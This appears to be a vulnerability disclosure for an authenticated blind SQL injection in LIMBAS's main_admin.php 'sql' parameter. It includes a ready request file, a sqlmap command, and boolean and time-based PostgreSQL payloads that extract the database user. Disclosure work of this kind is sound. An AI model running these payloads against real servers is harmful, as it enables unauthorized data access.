Vendor Homepage: https://www.limbas.com/en/
Github Link: https://github.com/limbas/limbas
Tested on: Ubuntu 20.04+ Apache/2.4.57 (Debian)+PHP 8.2.13(https://hub.docker.com/r/limbas/limbas)
After logging in to limbas using the admin account, the parameter 'sql' can be added to the page '/main_admin.php? action=setup_gtab_type&atid=1' to conduct blind SQL injection risks. It is recommended to take defensive measures such as input validation or parameterized queries for SQL statements. Using this vulnerability, attackers can control applications, change or access data, or exploit recent vulnerabilities in the underlying database. (https://github.com/limbas/limbas/blob/master/src/limbas_src/main_admin.php)
After logging in to limbas using the admin account, go to this address: "your_limbas_server/main_admin.php?action=setup_gtab_ftype&atid=1&sql=and%201=1"
- Firstly, by injecting "and%201=1" after "sql", the response is normal.
- Changing the value of the parameter 'sql' to "and 1=2" will change the content displayed on the page
Using "true" or "false" as well
- copy the request into the "http.txt".
GET /main_admin.php?action=setup_gtab_ftype&atid=1&sql=and%20true HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Cookie: metabase.DEVICE=f77093fd-d1ac-4eaf-b549-f651f07e3d57; _ga=GA1.1.244550719.1700448640; LMB_SESS_ID=npsni62iuu8l5pp3hdv3a4k4ik; limbas_explorer=1
Host: 172.43.1.2:8000
Origin: http://172.43.1.2:8000
Pragma: no-cache
Referer: http://172.43.1.2:8000/main_admin.php
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
- Using sqlmap to extract data can be successful.
sqlmap -r http.txt --batch --current-user
GET parameter 'sql' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 199 HTTP(s) requests:
---
Parameter: sql (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=setup_gtab_ftype&atid=1&sql=and true AND 1771=1771
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: action=setup_gtab_ftype&atid=1&sql=and true AND 8953=(SELECT 8953 FROM PG_SLEEP(5))
---
[16:47:17] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian
web application technology: Apache 2.4.57, PHP 8.2.13
back-end DBMS: PostgreSQL
[16:47:18] [INFO] fetching current user
[16:47:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:47:18] [INFO] retrieved: limbasuser
current user: 'limbasuser'
In "/src/limbas_src/admin/tables/gtab_ftype.dao" line 1048
(https://github.com/limbas/limbas/blob/v5.0.69/src/limbas_src/admin/tables/gtab_ftype.dao)
It can be found that the 'sql' variable is used to add query conditions to the SQL query statement. When the request includes the ftid and the 'ftid' parameter is a number, the SQL statement is executed in the form of "AND LMB_CONF_ FIELDS.FIELD_ID = $ftid". If the request does not include the 'ftid' parameter or the passed-in ftid parameter is not a number, the 'sql 'variable is empty. However, limbas will convert the parameters in the request into variables. When the request does not include the ftid parameter or the passed-in ftid parameter is not a number, we can pass in SQL parameters to overwrite the 'sql' variable with what we want to insert into the SQL statement to complete SQL injection.